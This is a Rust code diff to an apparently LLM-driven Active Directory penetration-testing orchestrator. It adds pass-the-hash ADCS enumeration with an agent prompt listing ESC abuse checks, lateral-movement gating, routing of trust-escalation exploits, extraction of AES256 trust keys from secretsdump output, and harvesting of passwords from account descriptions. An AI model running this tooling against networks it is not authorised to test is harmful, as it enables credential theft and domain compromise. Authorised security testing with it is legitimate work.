@@ -291,13 +324,18 @@ impl Dispatcher {
                 // The LLM's task_complete result is untrusted prose —
                 // any discovery-like keys it contains are ignored.
                 // Only ares-tools parsers (run on real tool stdout)
-                // produce authoritative discoveries.
+                // produce authoritative discoveries. LLM-fabricated
+                // findings live on a separate `llm_findings` field.
                 if let Some(obj) = result_json.as_object_mut() {
                     obj.remove("discoveries");
+                    obj.remove("llm_findings");
                 }
                 if let Some(disc) = merged_discoveries {
                     result_json["discoveries"] = disc;
                 }
+                if let Some(findings) = llm_findings_json.clone() {
+                    result_json["llm_findings"] = findings;
+                }
                 if !tool_outputs_json.is_empty() {
                     result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone());
@@ -320,6 +358,9 @@ impl Dispatcher {
                 if let Some(disc) = merged_discoveries {
                     result_json["discoveries"] = disc;
                 }
+                if let Some(findings) = llm_findings_json.clone() {
+                    result_json["llm_findings"] = findings;
+                }
                 if !tool_outputs_json.is_empty() {
                     result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone());
@@ -344,6 +385,9 @@ impl Dispatcher {
                 if let Some(disc) = merged_discoveries {
                     result_json["discoveries"] = disc;
                 }
+                if let Some(findings) = llm_findings_json.clone() {
+                    result_json["llm_findings"] = findings;
+                }
                 if !tool_outputs_json.is_empty() {
                     result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone());
@@ -363,6 +407,9 @@ impl Dispatcher {
                 if let Some(disc) = merged_discoveries {
                     result_json["discoveries"] = disc;
                 }
+                if let Some(findings) = llm_findings_json.clone() {
+                    result_json["llm_findings"] = findings;
+                }
                 if !tool_outputs_json.is_empty() {
                     result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone());
@@ -385,6 +432,9 @@ impl Dispatcher {
                 if let Some(disc) = merged_discoveries {
                     result_json["discoveries"] = disc;
                 }
+                if let Some(findings) = llm_findings_json.clone() {
+                    result_json["llm_findings"] = findings;
+                }
                 if !tool_outputs_json.is_empty() {
                     result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone());
diff --git a/ares-cli/src/orchestrator/dispatcher/task_builders.rs b/ares-cli/src/orchestrator/dispatcher/task_builders.rs
index 06b8c01f..bba89473 100644
--- a/ares-cli/src/orchestrator/dispatcher/task_builders.rs
+++ b/ares-cli/src/orchestrator/dispatcher/task_builders.rs
@@ -4,7 +4,7 @@ use anyhow::Result;
 use serde_json::json;
 use tracing::{debug, info};
 
-use crate::orchestrator::state::DEDUP_SCANNED_TARGETS;
+use crate::orchestrator::state::{DEDUP_CROSS_REALM_LATERAL, DEDUP_SCANNED_TARGETS};
 
 use super::Dispatcher;
 
@@ -219,12 +219,75 @@ impl Dispatcher {
     }
 
     /// Submit a lateral movement task.
+    ///
+    /// Refuses to dispatch when the credential's realm differs from the target
+    /// host's realm and no trust path is known — wrong-realm NTLM/Kerberos auth
+    /// against a foreign DC just returns ACCESS_DENIED and burns LLM tokens
+    /// (see the swarm of NORTH\catelyn → braavos.essos.local failures).
     pub async fn request_lateral(
         &self,
         target_ip: &str,
         credential: &ares_core::models::Credential,
         technique: &str,
     ) -> Result<Option<String>> {
+        // Stable key shared with the cross-realm guard below so a rejection
+        // permanently suppresses retries from credential_expansion and the LLM.
+        let cross_realm_key = format!(
+            "{}|{}|{}|{}",
+            credential.domain.to_lowercase(),
+            credential.username.to_lowercase(),
+            target_ip,
+            technique
+        );
+
+        {
+            let state = self.state.read().await;
+            if state.is_processed(DEDUP_CROSS_REALM_LATERAL, &cross_realm_key) {
+                debug!(
+                    target_ip = target_ip,
+                    cred_user = %credential.username,
+                    technique = technique,
+                    "Skipping lateral — already rejected as cross-realm dead-end"
+                );
+                return Ok(None);
+            }
+        }
+
+        // Resolve target's realm from state.hosts (FQDN suffix).
+        let target_domain = {
+            let state = self.state.read().await;
+            state
+                .hosts
+                .iter()
+                .find(|h| h.ip == target_ip)
+                .and_then(|h| h.hostname.split_once('.').map(|(_, d)| d.to_lowercase()))
+        };
+        if let Some(td) = target_domain {
+            let cd = credential.domain.to_lowercase();
+            if !cd.is_empty()
+                && cd != td
+                && !td.ends_with(&format!(".{cd}"))
+                && !cd.ends_with(&format!(".{td}"))
+            {
+                tracing::warn!(
+                    target_ip = %target_ip,
+                    target_domain = %td,
+                    cred_domain = %cd,
+                    cred_user = %credential.username,
+                    technique = %technique,
+                    "Refusing cross-realm lateral movement — use forest_trust_escalation or get a same-realm credential first"
+                );
+                {
+                    let mut state = self.state.write().await;
+                    state.mark_processed(DEDUP_CROSS_REALM_LATERAL, cross_realm_key.clone());
+                }
+                let _ = self
+                    .state
+                    .persist_dedup(&self.queue, DEDUP_CROSS_REALM_LATERAL, &cross_realm_key)
+                    .await;
+                return Ok(None);
+            }
+        }
         let payload = json!({
             "technique": technique,
             "target_ip": target_ip,
@@ -429,23 +492,78 @@ impl Dispatcher {
     }
 
     /// Submit a CERTIPY find task for ADCS enumeration.
+    ///
+    /// `ntlm_hash` and `hash_username` enable pass-the-hash authentication when
+    /// no cleartext credential is available for the target domain.
     pub async fn request_certipy_find(
         &self,
         target_ip: &str,
         domain: &str,
         credential: &ares_core::models::Credential,
+        ntlm_hash: Option<&str>,
+        hash_username: Option<&str>,
+        ca_host_ip: Option<&str>,
     ) -> Result<Option<String>> {
-        let payload = json!({
+        // When PTH hash is available, use the hash user's identity for the target domain
+        let (cred_user, cred_pass, cred_domain) = if let Some(_hash) = ntlm_hash {
+            let user = hash_username.unwrap_or(&credential.username);
+            (user.to_string(), String::new(), domain.to_string())
+        } else {
+            (
+                credential.username.clone(),
+                credential.password.clone(),
+                credential.domain.clone(),
+            )
+        };
+
+        let mut payload = json!({
             "technique": "certipy_find",
             "target_ip": target_ip,
             "domain": domain,
             "credential": {
-                "username": credential.username,
-                "password": credential.password,
-                "domain": credential.domain,
+                "username": cred_user,
+                "password": cred_pass,
+                "domain": cred_domain,
             },
+            "instructions": concat!(
+                "Run the certipy_find tool with vulnerable=true to enumerate vulnerable ",
+                "certificate templates and CAs.\n\n",
+                "IMPORTANT: You MUST pass vulnerable=true to certipy_find. Without it, the ",
+                "output will not flag ESC vulnerabilities and no vulns will be registered.\n\n",
+                "AUTHENTICATION: If password is empty and an NTLM hash is provided, use the ",
+                "certipy_find tool with the 'hashes' parameter (format ':nthash'). Do NOT pass ",
+                "an empty password.\n\n",
+                "If a password IS provided, use certipy_find with 'password' parameter.\n\n",
+                "For each vulnerable template found, register a vulnerability with:\n",
+                "  vuln_type: the ESC type (e.g. 'esc1', 'esc2', 'esc3', 'esc4', 'esc6', 'esc8', 'esc10', 'esc11', 'esc15')\n",
+                "  target: the certificate template name\n",
+                "  target_ip: the CA server IP\n",
+                "  domain: the domain\n",
+                "  details: include template_name, ca_name, enrollee_supplies_subject, ",
+                "client_authentication, any_purpose, enrollment_rights, and which users/groups can enroll\n\n",
+                "Check for: ESC1 (Enrollee Supplies Subject + Client Auth), ESC2 (Any Purpose EKU), ",
+                "ESC3 (enrollment agent), ESC4 (template ACL abuse), ESC6 (EDITF flag), ",
+                "ESC7 (ManageCA), ESC8 (Web Enrollment HTTP relay), ESC9 (UPN Spoofing), ",
+                "ESC10 (Weak Certificate Mapping / StrongCertificateBindingEnforcement=0), ",
+                "ESC11 (RPC enrollment relay / IF_ENFORCEENCRYPTICERTREQUEST disabled), ",
+                "ESC13 (Issuance Policy), ESC15 (Application Policy OID / CVE-2024-49019).\n",
+                "If certipy_find fails, try with -stdout flag."
+            ),
         });
 
-        self.throttled_submit("recon", "recon", payload, 4).await
+        // Attach hash for PTH authentication
+        if let Some(hash) = ntlm_hash {
+            payload["ntlm_hash"] = json!(hash);
+            if let Some(user) = hash_username {
+                payload["hash_username"] = json!(user);
+            }
+        }
+        // CA host IP for parser to set correct vuln target
+        if let Some(ca_ip) = ca_host_ip {
+            payload["ca_host_ip"] = json!(ca_ip);
+        }
+        // task_type "recon" → recon prompt template (supports instructions/ntlm_hash)
+        // target_role "privesc" → privesc tools (certipy_find is only in privesc)
+        self.throttled_submit("recon", "privesc", payload, 4).await
     }
 
     /// Refresh the operation lock TTL. Called periodically.
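The realm-containment test used by both the callback pre-check and `request_lateral` in this patch can be isolated into a tiny helper. A minimal sketch — the function name `is_cross_realm` is illustrative and not part of the codebase; the body mirrors the suffix checks shown in the diff:

```rust
/// Illustrative sketch (not the project's API): true when `cred_domain` and
/// `target_domain` belong to different realms with no parent/child
/// relationship — the condition under which the cross-realm lateral guard
/// in the diff refuses to dispatch.
fn is_cross_realm(cred_domain: &str, target_domain: &str) -> bool {
    let cd = cred_domain.to_lowercase();
    let td = target_domain.to_lowercase();
    !cd.is_empty()                          // unknown cred domain: allow
        && cd != td                         // same realm: allow
        && !td.ends_with(&format!(".{cd}")) // target is a child of cred realm
        && !cd.ends_with(&format!(".{td}")) // cred realm is a child of target
}
```

Note that the suffix checks treat parent/child domains of the same forest as in-realm (intra-forest lateral movement stays allowed), while unrelated forests are rejected.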
diff --git a/ares-cli/src/orchestrator/exploitation.rs b/ares-cli/src/orchestrator/exploitation.rs
index 2e3ce418..24a570cf 100644
--- a/ares-cli/src/orchestrator/exploitation.rs
+++ b/ares-cli/src/orchestrator/exploitation.rs
@@ -16,6 +16,7 @@ use tracing::{debug, info, warn};
 
 use ares_core::models::VulnerabilityInfo;
 
+use crate::orchestrator::automation::EXPLOITABLE_ESC_TYPES;
 use crate::orchestrator::dispatcher::Dispatcher;
 
 /// Cooldown before re-dispatching a failed exploit for the same vulnerability.
@@ -67,10 +68,18 @@ pub async fn exploitation_workflow(
         // Try to pop the highest-priority vuln from the ZSET
         match pop_next_vuln(&dispatcher).await {
             Ok(Some(vuln)) => {
-                // Skip delegation vulns — s4u.rs handles these with proper
-                // credential checking and lockout-aware dispatch. The generic
-                // exploitation path falls back to wrong credentials and
-                // produces LLM errors with missing target_spn.
+                // Skip vulns owned by dedicated automation modules — the
+                // generic exploitation path picks the wrong worker role and
+                // falls back to wrong credentials, producing LLM errors:
+                // - delegation (constrained/unconstrained/rbcd) is handled
+                //   by s4u.rs with credential checking and lockout-aware
+                //   dispatch.
+                // - ADCS ESC types are handled by auto_adcs_exploitation,
+                //   which routes each ESC variant to the correct role
+                //   (e.g. coercion for ESC8/ESC11, privesc for ESC1/ESC4)
+                //   via role_for_esc_type. Dropping them from the ZSET is
+                //   safe because that automation reads from
+                //   state.discovered_vulnerabilities, not the ZSET.
                 {
                     let vtype = vuln.vuln_type.to_lowercase();
                     if vtype == "constrained_delegation"
@@ -84,6 +93,28 @@ pub async fn exploitation_workflow(
                         );
                         continue;
                     }
+                    if EXPLOITABLE_ESC_TYPES.contains(&vtype.as_str()) {
+                        debug!(
+                            vuln_id = %vuln.vuln_id,
+                            vuln_type = %vuln.vuln_type,
+                            "Skipping ADCS ESC vuln (handled by auto_adcs_exploitation)"
+                        );
+                        continue;
+                    }
+                    // child_to_parent and forest_trust_escalation are handled by
+                    // auto_trust_follow (trust.rs) via direct dispatch_tool calls
+                    // to raise_child / create_inter_realm_ticket. The generic
+                    // exploit dispatcher hands these off to a generic LLM agent
+                    // that lacks the orchestrator-resolved SIDs and trust keys,
+                    // so it requests assistance and burns budget.
+                    if vtype == "child_to_parent" || vtype == "forest_trust_escalation" {
+                        debug!(
+                            vuln_id = %vuln.vuln_id,
+                            vuln_type = %vuln.vuln_type,
+                            "Skipping trust vuln (handled by auto_trust_follow)"
+                        );
+                        continue;
+                    }
                 }
 
                 // Check strategy technique filter — skip vulns blocked by
diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs
index 003bd7af..f1f134ba 100644
--- a/ares-cli/src/orchestrator/mod.rs
+++ b/ares-cli/src/orchestrator/mod.rs
@@ -153,43 +153,75 @@ async fn run_inner() -> Result<()> {
     // Seed domain_controllers from target IPs so automation tasks
     // (AS-REP roast, Kerberoast, BloodHound, delegation enum) can fire
     // immediately without waiting for recon to report back.
-    // Probe port 88 (Kerberos) to find a real DC, don't blindly use first IP.
+    //
+    // Probe ALL target IPs on port 88/389 to find every DC, then query
+    // each DC's LDAP rootDSE (`defaultNamingContext`) to discover which
+    // domain it serves. This eliminates the race condition where
+    // automation tasks fire before recon discovers child-domain DCs
+    // (e.g. child.contoso.local at 192.168.58.11 vs the parent
+    // contoso.local at 192.168.58.10).
     if state.domain_controllers.is_empty() {
-        let dc_ip = bootstrap::probe_dc_port(&config.target_ips).await;
-        if let Some(ref ip) = dc_ip {
+        let dc_map = bootstrap::discover_dc_domains(&config.target_ips, &domain).await;
+
+        if !dc_map.is_empty() {
             let dc_key = format!(
                 "{}:{}:{}",
                 ares_core::state::KEY_PREFIX,
                 state.operation_id,
                 ares_core::state::KEY_DC_MAP,
             );
+            let domain_key = format!("ares:op:{}:domains", state.operation_id);
             let mut conn = queue.connection();
+
+            for (dc_domain, dc_ip) in &dc_map {
+                let _: Result<(), _> =
+                    redis::AsyncCommands::hset(&mut conn, &dc_key, dc_domain, dc_ip).await;
+                state
+                    .domain_controllers
+                    .insert(dc_domain.clone(), dc_ip.clone());
+
+                // Add discovered domains to the domains list so automation
+                // tasks can enumerate them (AS-REP roast, BloodHound, etc.)
+                if !state.domains.contains(dc_domain) {
+                    state.domains.push(dc_domain.clone());
+                    let _: Result<(), _> =
+                        redis::AsyncCommands::sadd(&mut conn, &domain_key, dc_domain).await;
+                }
+
+                info!(
+                    domain = %dc_domain,
+                    dc_ip = %dc_ip,
+                    "Seeded domain controller from bootstrap DC discovery"
+                );
+            }
+
             let _: Result<(), _> =
-                redis::AsyncCommands::hset(&mut conn, &dc_key, &domain, ip).await;
-            state.domain_controllers.insert(domain.clone(), ip.clone());
-            info!(
-                domain = %domain,
-                dc_ip = %ip,
-                "Seeded domain controller from target IPs (port 88 probe)"
-            );
+                redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await;
 
-            // Also register the credential's domain (may differ from target_domain,
-            // e.g., child.contoso.local vs contoso.local).
-            // This ensures automation tasks (spray, kerberoast) can find a DC
-            // for the credential's domain.
+            // Also register the credential's domain if not already mapped.
+            // The credential domain may differ from any discovered DC domain
+            // (e.g. if the credential is for a domain whose DC is behind a
+            // firewall and didn't respond to probes).
             if let Some(ref cred) = config.initial_credential {
                 let cred_domain = cred.domain.to_lowercase();
-                if cred_domain != domain && !cred_domain.is_empty() {
-                    let _: Result<(), _> =
-                        redis::AsyncCommands::hset(&mut conn, &dc_key, &cred_domain, ip)
-                            .await;
+                if !cred_domain.is_empty()
+                    && !state.domain_controllers.contains_key(&cred_domain)
+                {
+                    // Use the first discovered DC as fallback for the
+                    // credential's domain — better than no mapping at all.
+                    let fallback_ip = &dc_map[0].1;
+                    let _: Result<(), _> = redis::AsyncCommands::hset(
+                        &mut conn,
+                        &dc_key,
+                        &cred_domain,
+                        fallback_ip,
+                    )
+                    .await;
                     state
                         .domain_controllers
-                        .insert(cred_domain.clone(), ip.clone());
-                    // Also add this domain to the domains set
+                        .insert(cred_domain.clone(), fallback_ip.clone());
                     if !state.domains.contains(&cred_domain) {
                         state.domains.push(cred_domain.clone());
-                        let domain_key = format!("ares:op:{}:domains", state.operation_id);
                         let _: Result<(), _> = redis::AsyncCommands::sadd(
                             &mut conn,
                             &domain_key,
@@ -199,8 +231,8 @@ async fn run_inner() -> Result<()> {
                     }
                     info!(
                         cred_domain = %cred_domain,
-                        dc_ip = %ip,
-                        "Also registered credential domain in DC map"
+                        dc_ip = %fallback_ip,
+                        "Registered credential domain with fallback DC"
                     );
                 }
             }
diff --git a/ares-cli/src/orchestrator/output_extraction/hashes.rs b/ares-cli/src/orchestrator/output_extraction/hashes.rs
index 2979d432..0c06419e 100644
--- a/ares-cli/src/orchestrator/output_extraction/hashes.rs
+++ b/ares-cli/src/orchestrator/output_extraction/hashes.rs
@@ -29,10 +29,30 @@ static RE_NTLM_PARTIAL: LazyLock<Regex> =
 static RE_NTLM_CONTINUATION: LazyLock<Regex> =
     LazyLock::new(|| Regex::new(r"^[a-fA-F0-9]+:::$").unwrap());
 
+// AES256 trust/account key from secretsdump:
+//   DOMAIN\\user:aes256-cts-hmac-sha1-96:<key>
+//   domain.local/user:aes256-cts-hmac-sha1-96:<key>
+//   user:aes256-cts-hmac-sha1-96:<key>
+static RE_AES256_KEY: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"(?:[^\\/\s:]+[\\/])?([^:\s\\/]+):aes256-cts-hmac-sha1-96:([a-fA-F0-9]+)").unwrap()
+});
+
 pub fn extract_hashes(output: &str, default_domain: &str) -> Vec<Hash> {
     let mut hashes = Vec::new();
     let mut seen = std::collections::HashSet::new();
 
+    // Pre-scan for AES256 keys; these are emitted on separate lines from the
+    // NTLM hash by impacket-secretsdump. Win2016+ DCs reject RC4-only
+    // inter-realm tickets (KDC_ERR_TGT_REVOKED), so we attach the AES256 key
+    // to the matching Hash entry by username.
+    let mut aes_by_user: std::collections::HashMap<String, String> =
+        std::collections::HashMap::new();
+    for caps in RE_AES256_KEY.captures_iter(output) {
+        let user = caps.get(1).unwrap().as_str().to_lowercase();
+        let aes = caps.get(2).unwrap().as_str().to_lowercase();
+        aes_by_user.insert(user, aes);
+    }
+
     // First pass: unwrap line-wrapped NTLM hashes
     let lines: Vec<&str> = output.lines().collect();
     let mut unwrapped: Vec<String> = Vec::new();
@@ -72,7 +92,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec<Hash> {
                 discovered_at: Some(chrono::Utc::now()),
                 parent_id: None,
                 attack_step: 0,
-                aes_key: None,
+                aes_key: aes_by_user.get(&username.to_lowercase()).cloned(),
             });
         }
         continue;
@@ -100,7 +120,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec<Hash> {
                 discovered_at: Some(chrono::Utc::now()),
                 parent_id: None,
                 attack_step: 0,
-                aes_key: None,
+                aes_key: aes_by_user.get(&username.to_lowercase()).cloned(),
             });
         }
         continue;
@@ -126,7 +146,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec<Hash> {
                 discovered_at: Some(chrono::Utc::now()),
                 parent_id: None,
                 attack_step: 0,
-                aes_key: None,
+                aes_key: aes_by_user.get(&username.to_lowercase()).cloned(),
            });
         }
         continue;
@@ -155,7 +175,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec<Hash> {
                 discovered_at: Some(chrono::Utc::now()),
                 parent_id: None,
                 attack_step: 0,
-                aes_key: None,
+                aes_key: aes_by_user.get(&username.to_lowercase()).cloned(),
             });
         }
     }
@@ -362,6 +382,20 @@ mod tests {
         assert!(extract_hashes("", "CONTOSO").is_empty());
     }
 
+    #[test]
+    fn extract_hashes_attaches_aes256_to_trust_account() {
+        let output = "\
+FABRIKAM\\CONTOSO$:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
+FABRIKAM\\CONTOSO$:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444";
+        let hashes = extract_hashes(output, "fabrikam.local");
+        assert_eq!(hashes.len(), 1);
+        assert_eq!(hashes[0].username, "CONTOSO$");
+        assert_eq!(
+            hashes[0].aes_key.as_deref(),
+            Some("4444444444444444444444444444444444444444444444444444444444444444")
+        );
+    }
+
     #[test]
     fn extract_cracked_passwords_hashcat_tgs() {
         let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01*$aabb$ccdd:Summer2024!";
diff --git a/ares-cli/src/orchestrator/output_extraction/hosts.rs b/ares-cli/src/orchestrator/output_extraction/hosts.rs
index f61053dc..f20fd7b6 100644
--- a/ares-cli/src/orchestrator/output_extraction/hosts.rs
+++ b/ares-cli/src/orchestrator/output_extraction/hosts.rs
@@ -56,9 +56,23 @@ pub fn extract_hosts(output: &str) -> Vec<Host> {
             .map(|c| c.get(1).unwrap().as_str().trim().to_string())
             .unwrap_or_default();
 
+        // Synthesize FQDN as `<netbios>.<domain>`, but reject workgroup-only
+        // hosts where impacket reports the machine's NetBIOS name as the
+        // first label of the "domain" field (e.g.
+        // `(name:WIN-X) (domain:WIN-X.GXM0.LOCAL)` from a non-domain-joined
+        // Windows box). Without this guard we synthesize
+        // `win-x.win-x.gxm0.local` and `publish_host` then extracts the
+        // junk suffix `win-x.gxm0.local` into `state.domains`.
let hostname = if !netbios_name.is_empty() && !domain.is_empty() && !netbios_name.contains('.') { - format!("{}.{}", netbios_name.to_lowercase(), domain.to_lowercase()) + let nb = netbios_name.to_lowercase(); + let dom = domain.to_lowercase(); + let workgroup_self = dom == nb || dom.starts_with(&format!("{}.", nb)); + if workgroup_self { + netbios_name + } else { + format!("{nb}.{dom}") + } } else { netbios_name }; @@ -162,6 +176,20 @@ SMB 192.168.58.10 445 DC01 [*] Windows Server (name:DC01) (domain:contoso.l assert!(extract_hosts("").is_empty()); } + #[test] + fn extract_workgroup_self_domain_does_not_duplicate_netbios() { + // Workgroup-only Windows hosts often report their own NetBIOS name as + // the first label of the SMB "domain" field. We must NOT synthesize + // `win-x.win-x.gxm0.local`; use the bare NetBIOS name instead so the + // junk suffix never reaches `state.domains`. + let output = "SMB 192.168.58.30 445 WIN-E4G4GC587O4 [*] Windows Server 2003 \ + (name:WIN-E4G4GC587O4) (domain:WIN-E4G4GC587O4.GXM0.LOCAL) (signing:False)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].hostname, "WIN-E4G4GC587O4"); + assert!(!hosts[0].hostname.contains('.')); + } + #[test] fn extract_multiple_hosts() { let output = "\ diff --git a/ares-cli/src/orchestrator/output_extraction/passwords.rs b/ares-cli/src/orchestrator/output_extraction/passwords.rs index 2d06a50a..12386af7 100644 --- a/ares-cli/src/orchestrator/output_extraction/passwords.rs +++ b/ares-cli/src/orchestrator/output_extraction/passwords.rs @@ -31,10 +31,78 @@ static RE_NETEXEC_SUCCESS: LazyLock = LazyLock::new(|| { Regex::new(r"\[\+\]\s+([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+):([^\s(]+)").unwrap() }); +/// Regex for rpcclient `queryuser` output: `User Name :\tjdoe` +static RE_RPC_USER_NAME: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)^\s*User\s+Name\s*:\s*(\S+)").unwrap()); + +/// Extract credentials from rpcclient queryuser blocks where "User Name" and +/// 
"Description" (containing a password) appear on separate lines. +/// +/// This is safe because rpcclient queryuser output is deterministic: attributes +/// always belong to the same user within a single query response block. +fn extract_rpcclient_description_passwords( + output: &str, + default_domain: &str, + seen: &mut std::collections::HashSet, +) -> Vec { + let mut credentials = Vec::new(); + let mut current_user: Option = None; + + for line in output.lines() { + let stripped = line.trim(); + // Track the current user from "User Name : xxx" + if let Some(caps) = RE_RPC_USER_NAME.captures(stripped) { + current_user = Some(caps.get(1).unwrap().as_str().to_string()); + continue; + } + // Empty line or new block separator resets user context + if stripped.is_empty() { + current_user = None; + continue; + } + // Look for password in Description field + if let Some(ref username) = current_user { + if stripped.to_lowercase().contains("description") + && stripped.to_lowercase().contains("password") + { + if let Some(caps) = RE_PASSWORD_VALUE.captures(stripped) { + let password = caps + .get(1) + .unwrap() + .as_str() + .trim_end_matches(|c: char| ".,;:()".contains(c)) + .trim_matches('\'') + .trim_matches('"') + .to_string(); + if is_valid_credential(username, &password) { + let key = format!("{}\\{}:{}", default_domain, username, password); + if seen.insert(key) { + credentials.push(make_credential( + username, + &password, + default_domain, + "description_field", + )); + } + } + } + } + } + } + credentials +} + pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec { let mut credentials = Vec::new(); let mut seen = std::collections::HashSet::new(); + // First pass: extract from rpcclient queryuser blocks (multi-line) + credentials.extend(extract_rpcclient_description_passwords( + output, + default_domain, + &mut seen, + )); + const FAILURE_MARKERS: &[&str] = &[ "STATUS_LOGON_FAILURE", "STATUS_PASSWORD_EXPIRED", @@ -118,10 +186,18 @@ pub fn 
extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec = LazyLock::new(|| { Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}").unwrap() }); +/// Check if a domain string looks like a machine hostname rather than an AD domain. +/// +/// Machine FQDNs like `win-g7fpa5zzxzv.w5an.local` or NetBIOS machine names like +/// `WIN-G7FPA5ZZXZV` pollute domain tracking when they appear in SMB banners or +/// UPN suffixes (e.g., null session enum on a DC reports the Kali box's own domain). +pub fn is_machine_hostname_domain(domain: &str) -> bool { + let first_label = domain.split('.').next().unwrap_or(domain); + let lower = first_label.to_lowercase(); + // Windows auto-generated hostnames: WIN-XXXXXXXX, DESKTOP-XXXXXXX + if lower.starts_with("win-") || lower.starts_with("desktop-") { + return true; + } + false +} + /// Reject garbage usernames and invalid domains from regex extraction. pub fn is_valid_extracted_user(username: &str, domain: &str) -> bool { if username.is_empty() || username.ends_with('$') { @@ -83,12 +98,17 @@ pub fn extract_users(output: &str, default_domain: &str) -> Vec { let stripped = line.trim(); if let Some(caps) = RE_DOMAIN_CONTEXT.captures(stripped) { - current_domain = caps + let captured = caps .get(1) .unwrap() .as_str() .trim_end_matches('.') .to_string(); + // Don't let machine hostnames (e.g. from Kali's own SMB banner) + // override the task's default domain. + if !is_machine_hostname_domain(&captured) { + current_domain = captured; + } } let mut found = Vec::new(); @@ -102,7 +122,13 @@ pub fn extract_users(output: &str, default_domain: &str) -> Vec { if let Some(caps) = RE_UPN.captures(stripped) { let user = caps.get(1).unwrap().as_str(); let dom = caps.get(2).unwrap().as_str(); - found.push((user.to_string(), dom.to_string())); + // If UPN suffix is a machine hostname (e.g. user@win-xxx.w5an.local), + // substitute the default domain to avoid storing garbage domains. 
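The machine-hostname filter and the UPN substitution it feeds can be sketched std-only as follows (the helper `upn_domain` is an assumed name for illustration; the diff inlines this logic in `extract_users`):

```rust
/// Windows auto-generated names (WIN-*, DESKTOP-*) in the first label mark
/// the value as a machine hostname, not an AD domain.
fn is_machine_hostname_domain(domain: &str) -> bool {
    let first_label = domain.split('.').next().unwrap_or(domain);
    let lower = first_label.to_lowercase();
    lower.starts_with("win-") || lower.starts_with("desktop-")
}

/// Substitute the task's default domain when a UPN suffix is a machine FQDN,
/// so garbage domains never reach state tracking.
fn upn_domain<'a>(upn_suffix: &'a str, default_domain: &'a str) -> &'a str {
    if is_machine_hostname_domain(upn_suffix) {
        default_domain
    } else {
        upn_suffix
    }
}
```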
+ if is_machine_hostname_domain(dom) { + found.push((user.to_string(), default_domain.to_string())); + } else { + found.push((user.to_string(), dom.to_string())); + } } for caps in RE_USER_BRACKET.captures_iter(stripped) { @@ -216,4 +242,67 @@ mod tests { fn extract_users_empty_output() { assert!(extract_users("", "contoso.local").is_empty()); } + + // --- is_machine_hostname_domain --- + + #[test] + fn machine_hostname_win_prefix() { + assert!(is_machine_hostname_domain("WIN-G7FPA5ZZXZV")); + assert!(is_machine_hostname_domain("win-abc123")); + } + + #[test] + fn machine_hostname_win_fqdn() { + assert!(is_machine_hostname_domain("win-g7fpa5zzxzv.w5an.local")); + assert!(is_machine_hostname_domain("WIN-ABC123.contoso.local")); + } + + #[test] + fn machine_hostname_desktop_prefix() { + assert!(is_machine_hostname_domain("DESKTOP-ABC1234")); + assert!(is_machine_hostname_domain("desktop-xyz.corp.local")); + } + + #[test] + fn real_domain_not_machine_hostname() { + assert!(!is_machine_hostname_domain("contoso.local")); + assert!(!is_machine_hostname_domain("child.contoso.local")); + assert!(!is_machine_hostname_domain("CONTOSO")); + assert!(!is_machine_hostname_domain("CHILD")); + } + + // --- extract_users with machine hostname filtering --- + + #[test] + fn extract_users_smb_banner_machine_domain_ignored() { + // SMB banner with Kali machine domain should not override default_domain + let output = concat!( + "SMB 192.168.58.10 445 DC01 (domain:WIN-G7FPA5ZZXZV) ...\n", + "user:[jdoe] rid:[0x44e]\n", + ); + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "jdoe"); + // Should use default_domain, not the machine hostname + assert_eq!(users[0].domain, "contoso.local"); + } + + #[test] + fn extract_users_upn_machine_domain_substituted() { + // UPN with machine FQDN should substitute default_domain + let output = "jdoe@win-g7fpa5zzxzv.w5an.local\n"; + let users = extract_users(output, "contoso.local"); + 
assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "jdoe"); + assert_eq!(users[0].domain, "contoso.local"); + } + + #[test] + fn extract_users_real_upn_preserved() { + // Real UPN should keep its domain + let output = "jdoe@contoso.local\n"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].domain, "contoso.local"); + } } diff --git a/ares-cli/src/orchestrator/result_processing/admin_checks.rs b/ares-cli/src/orchestrator/result_processing/admin_checks.rs index aae0e95b..6a6209dd 100644 --- a/ares-cli/src/orchestrator/result_processing/admin_checks.rs +++ b/ares-cli/src/orchestrator/result_processing/admin_checks.rs @@ -7,7 +7,77 @@ use serde_json::Value; use tracing::{info, warn}; use super::parsing::has_domain_admin_indicator; +use super::timeline::{create_admin_upgrade_timeline_event, create_domain_admin_timeline_event}; use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::StateInner; + +/// Resolve a NetBIOS/flat domain name (e.g. `ESSOS`) to a known FQDN. +/// +/// Checks three sources, in order: +/// 1. `state.trusted_domains`: each `TrustInfo` carries an explicit `flat_name`. +/// 2. `state.netbios_to_fqdn`: published mappings from host short names; useful +/// when the flat name happens to match a hostname mapping. +/// 3. `state.domains`: derive each FQDN's first label and compare. Catches the +/// primary domain (which is rarely in `trusted_domains`). +/// +/// Returns `None` when the flat name does not correspond to any known domain. +/// Callers must treat that as "skip caching" — guessing risks attributing the +/// SID to the wrong domain. 
